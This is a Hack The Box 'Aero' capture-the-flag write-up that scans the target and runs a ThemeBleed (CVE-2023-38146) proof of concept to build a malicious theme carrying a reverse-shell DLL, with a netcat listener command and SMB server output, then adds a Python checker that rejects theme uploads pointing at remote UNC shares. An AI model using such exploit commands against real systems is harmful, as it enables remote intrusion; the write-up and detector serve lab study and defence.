Looking for light.

HTB——Aero


0x01 Information Gathering

 _____                             ___  _             
/__   \ ___   ___   __ _  _ __    / _ \| | _   _  ___ 
  / /\// __| / __| / _' || '_ \  / /_)/| || | | |/ __|
 / /   \__ \| (__ | (_| || | | |/ ___/ | || |_| |\__ \
 \/    |___/ \___| \__,_||_| |_|\/     |_| \__,_||___/

https://github.com/TideSec/TscanPlus
TscanClient Version: 2.7.4  NewVersion: 2.7.6  Expired: 2026.01.01
[09:46:03] [INFO] Start IpScan:10.129.231.48
[09:46:03] [INFO] 开始扫描 1 个主机的 65535 个端口,共 65535 个任务

[09:46:04] [+] 10.129.231.48:80 open
[09:46:04] [+] [TCP/HTTP] [200] [Microsoft-IIS/10.0] http://10.129.231.48:80 [Aero Theme Hub]

The scan found only one open TCP port, so the only thing to do first is visit the service on port 80. Inspecting the component code with the browser developer tools (F12), we can see that it accepts uploaded files with the themepack or theme extension.



0x02 Reproducing CVE-2023-38146

A quick search shows that CVE-2023-38146 meets our requirements. With persistence in mind, we want to use DLL hijacking to get a session back.

Using a derivative of this project, we first generate our malicious DLL containing a reverse shell.

┌──(root㉿kali)-[/home/kali/HTB/Aero/CVE-2023-38146-main]
└─# python3 themebleed.py -r 10.10.16.12 -p 4711 -n
2025-04-12 10:56:06,729 INFO> ThemeBleed CVE-2023-38146 PoC [https://github.com/Jnnshschl]
2025-04-12 10:56:06,730 INFO> Credits to -> https://github.com/gabe-k/themebleed, impacket and cabarchive

2025-04-12 10:56:06,730 INFO> Theme generated: "evil_theme.theme"
2025-04-12 10:56:06,730 INFO> Themepack generated: "evil_theme.themepack"

2025-04-12 10:56:06,730 INFO> Remember to start netcat: rlwrap -cAr nc -lvnp 4711
2025-04-12 10:56:06,730 INFO> Starting SMB server: 10.10.16.12:445

2025-04-12 10:56:06,730 INFO> Config file parsed
2025-04-12 10:56:06,730 INFO> Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2025-04-12 10:56:06,730 INFO> Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2025-04-12 10:56:06,730 INFO> Config file parsed
2025-04-12 10:56:06,730 INFO> Config file parsed
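From the defender's side, the thing to notice in the PoC output above is that the generated theme only works because the PoC also starts an SMB server: the .theme file (a plain INI file) points the visual style at a resource on a remote share, and that is what CVE-2023-38146 rides on. A site like the Aero Theme Hub that accepts theme uploads can therefore refuse any theme whose values reference a UNC path. The checker below is an added example written for this page; it is not code from the writeup or from the ThemeBleed PoC. It assumes the upload is the INI-style .theme file (a .themepack is a cabinet archive wrapping the .theme and would have to be extracted first, which the cabarchive library credited in the PoC output can do), and the two sample themes are constructed, with a TEST-NET address as a placeholder rather than anything from this box.

```python
import configparser
import re
from typing import List

# Constructed sample: a theme that references only a local, system-provided style.
SAFE_THEME = """[Theme]
DisplayName=Corporate Blue

[VisualStyles]
Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
ColorStyle=NormalColor
"""

# Constructed sample: the visual style path points at a remote SMB share
# (192.0.2.10 is a documentation/TEST-NET placeholder, not a real host).
SUSPICIOUS_THEME = """[Theme]
DisplayName=Totally Fine

[VisualStyles]
Path=\\\\192.0.2.10\\share\\evil.msstyles
"""

# A value is "remote" if it starts with a UNC prefix: \\server\share or //server/share.
# \\?\UNC\server\share also begins with two backslashes and is caught by the same rule.
UNC_RE = re.compile(r"^(\\\\|//)")


def find_remote_references(theme_text: str) -> List[str]:
    """Return 'Section.Key=value' for every value in the theme that is a UNC path."""
    # interpolation=None so '%SystemRoot%' is not treated as a format directive;
    # strict=False because real theme files sometimes repeat keys.
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # keep key names case-sensitive for readable findings
    parser.read_string(theme_text)

    findings: List[str] = []
    for section in parser.sections():
        for key, value in parser.items(section):
            value = value.strip()
            if UNC_RE.match(value):
                findings.append(f"{section}.{key}={value}")
    return findings


def is_acceptable_theme(theme_text: str) -> bool:
    """Upload gate: accept the theme only if nothing in it points off the local machine."""
    return not find_remote_references(theme_text)


if __name__ == "__main__":
    for name, text in (("safe", SAFE_THEME), ("suspicious", SUSPICIOUS_THEME)):
        hits = find_remote_references(text)
        verdict = "ACCEPT" if not hits else "REJECT"
        print(f"{name}: {verdict} {hits}")
```

Running the module prints ACCEPT for the first sample and REJECT for the second, naming the offending VisualStyles.Path entry. The check is deliberately coarse: it looks at every key in every section rather than only VisualStyles, so a theme that smuggles a UNC path into a wallpaper or cursor entry is rejected as well.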

Unfortunately, possibly because of a problem with my own environment, I could not get the shell to come back. I will dig into this further when I get the chance.